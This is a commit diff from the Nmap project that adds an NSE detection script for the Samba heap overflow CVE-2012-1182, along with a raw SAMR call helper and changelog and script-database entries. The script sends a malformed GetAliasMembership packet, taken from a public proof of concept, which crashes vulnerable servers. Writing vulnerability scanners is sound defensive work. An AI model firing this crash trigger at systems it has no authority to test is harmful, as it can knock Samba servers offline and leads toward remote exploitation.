o [NSE] Added the script samba-vuln-cve-2012-1182 which detects the SAMBA CVE

2012-1182 vulnerability. [Aleksandar Nikolic]

CHANGELOG

@@ -1,6 +1,9 @@
 # Nmap Changelog ($Id$); -*-text-*-
 
-o [NSE] Added the dns-check-zone script that checks DNS configuration against
+o [NSE] Added the script samba-vuln-cve-2012-1182 which detects the SAMBA CVE
+  2012-1182 vulnerability. [Aleksandar Nikolic]
+
+o [NSE] Added the script dns-check-zone that checks DNS configuration against
   best practices including RFC 1912. [Patrik Karlsson]
 
 o [NSE] Added the http-gitweb-projects-enum that queries a gitweb for a list

nselib/msrpc.lua

@@ -1584,6 +1584,29 @@ function samr_openalias(smbstate, domain_handle, rid)
 	return true, result
 end
 
+---Call the <code>GetAliasMembership</code> function. 
+--Sends the "raw" data, without marshaling. 
+-- 
+--@param smbstate       The SMB state table
+--@param alias_handle   The alias_handle, already marshaled
+--@param args			Actuall data to send, already marshaled
+--@return (status, result) If status is false, result is an error message. Otherwise, result is a table of values. 
+function samr_getaliasmembership(smbstate, alias_handle,args)
+	local status, result
+	local arguments
+
+	arguments = ''
+
+	arguments = arguments .. alias_handle .. args
+	-- Do the call
+	status, result = call_function(smbstate, 0x10, arguments)
+	if(status ~= true) then
+		return false, result
+	end
+
+	return true, result
+end
+
 ---Call the <code>GetMembersInAlias</code> function, which retrieves a list of users in 
 -- a group. 
 --

scripts/samba-vuln-cve-2012-1182.nse

@@ -0,0 +1,127 @@
+description = [[
+Check if the machine is vulnerable to Samba heap overflow vulnerability
+marked with CVE-2012-1182. 
+
+Samba versions 3.6.3 and all versions previous to this are affected by
+a vulnerability that allows remote code execution as the "root" user
+from an anonymous connection.
+
+
+CVE-2012-1182 marks multiple heap overflow vulnerabilities located in 
+PIDL based autogenerated code. This check script is based on PoC by ZDI
+marked as ZDI-CAN-1503. Vulnerability lies in ndr_pull_lsa_SidArray 
+function where an attacker is under control of num_sids and can cause
+insuficient memory to be allocated, leading to heap buffer overflow
+and posibility of remote code execution. 
+
+Script builds a malitious packet and makes a SAMR GetAliasMembership 
+call which triggers the vulnerability. On the vulnerable system,
+connection is droped and result is "Failed to receive bytes after 5 attempts".
+On patched system, samba throws an error and result is  "MSRPC call 
+returned a fault (packet type)". 
+
+References: 
+* https://bugzilla.samba.org/show_bug.cgi?id=8815
+* http://www.samba.org/samba/security/CVE-2012-1182
+
+]]
+
+-----------------------------------------------------------------------
+---
+-- @usage
+-- nmap --script=samba-vuln-cve-2012-1182  -p 139 <target>
+-- @output
+-- PORT    STATE SERVICE
+-- 139/tcp open  netbios-ssn
+-- 
+-- Host script results:
+-- | samba-vuln-cve-2012-1182: 
+-- |   VULNERABLE:
+-- |   SAMBA remote heap overflow
+-- |     State: VULNERABLE
+-- |     IDs:  CVE:CVE-2012-1182
+-- |     Risk factor: HIGH  CVSSv2: 10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)
+-- |     Description:
+-- |       Samba versions 3.6.3 and all versions previous to this are affected by
+-- |       a vulnerability that allows remote code execution as the "root" user
+-- |       from an anonymous connection.
+-- |       
+-- |     Disclosure date: 2012-03-15
+-- |     References:
+-- |       http://www.samba.org/samba/security/CVE-2012-1182
+-- |_      http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182
+
+author = "Aleksandar Nikolic"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"vuln","intrusive"}
+
+require 'msrpc'
+require 'smb'
+require 'stdnse'
+require 'vulns'
+hostrule = function(host)
+	return smb.get_port(host) ~= nil
+end
+
+action = function(host,port)
+
+	local result, stats
+	local response = {}
+
+	local samba_cve  = {
+		title = "SAMBA remote heap overflow",
+		IDS = {CVE = 'CVE-2012-1182'},
+		risk_factor = "HIGH",
+		scores = {
+		  CVSSv2 = "10.0 (HIGH) (AV:N/AC:L/Au:N/C:C/I:C/A:C)",
+		},
+		description = [[
+Samba versions 3.6.3 and all versions previous to this are affected by
+a vulnerability that allows remote code execution as the "root" user
+from an anonymous connection.
+		]],
+		references = {
+		  'http://www.samba.org/samba/security/CVE-2012-1182',
+		},
+		dates = {
+		  disclosure = {year = '2012', month = '03', day = '15'},
+		},
+		exploit_results = {},
+	}
+
+	local report = vulns.Report:new(SCRIPT_NAME, host, port)
+	samba_cve.state = vulns.STATE.NOT_VULN
+
+	-- create SMB session
+	status, smbstate = msrpc.start_smb(host, msrpc.SAMR_PATH,true)
+	if(status == false) then
+		return false, smbstate
+	end
+	
+	-- bind to SAMR service
+	status, bind_result = msrpc.bind(smbstate, msrpc.SAMR_UUID, msrpc.SAMR_VERSION, nil)
+	if(status == false) then
+		msrpc.stop_smb(smbstate)
+		return false, bind_result
+	end
+
+	-- create malicious packet, same as in the PoC
+	data = bin.pack("<I",4096)  -- num_sids
+					.. "abcd" 
+         ..bin.pack("<III",100
+						  ,0
+						  ,100)
+		 ..string.rep("a",1000)
+		 						
+	marshaledHandle = string.rep("X",20)
+	status, result = msrpc.samr_getaliasmembership(smbstate,marshaledHandle, data)
+	print(status, result)
+	if(status == false and string.find(result,"Failed to receive bytes after 5 attempts") ~= nil) then
+		samba_cve.state = vulns.STATE.VULN -- connection droped, server crashed 
+	end	
+	
+	return report:make_output(samba_cve)
+
+end
+
+

scripts/script.db

@@ -276,6 +276,7 @@ Entry { filename = "rsync-brute.nse", categories = { "brute", "intrusive", } }
 Entry { filename = "rsync-list-modules.nse", categories = { "discovery", "safe", } }
 Entry { filename = "rtsp-methods.nse", categories = { "default", "safe", } }
 Entry { filename = "rtsp-url-brute.nse", categories = { "brute", "intrusive", } }
+Entry { filename = "samba-vuln-cve-2012-1182.nse", categories = { "intrusive", "vuln", } }
 Entry { filename = "servicetags.nse", categories = { "default", "discovery", "safe", } }
 Entry { filename = "sip-brute.nse", categories = { "brute", "intrusive", } }
 Entry { filename = "sip-enum-users.nse", categories = { "auth", "intrusive", } }